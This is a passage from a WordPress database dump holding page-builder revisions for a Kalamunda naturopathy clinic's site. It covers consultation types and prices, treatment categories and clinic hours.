style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\" custom_padding=\"||3px|||\" sticky_enabled=\"0\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 21:31:27','2021-05-27 13:31:27','',28,'https://verdenaturopathy.com.au/?p=263',0,'revision','',0),(327,1,'2021-06-15 12:42:59','2021-06-15 04:42:59','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-06-15 12:42:59','2021-06-15 04:42:59','',188,'https://verdenaturopathy.com.au/?p=327',0,'revision','',0),(267,1,'2021-05-27 21:33:46','2021-05-27 13:33:46','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" 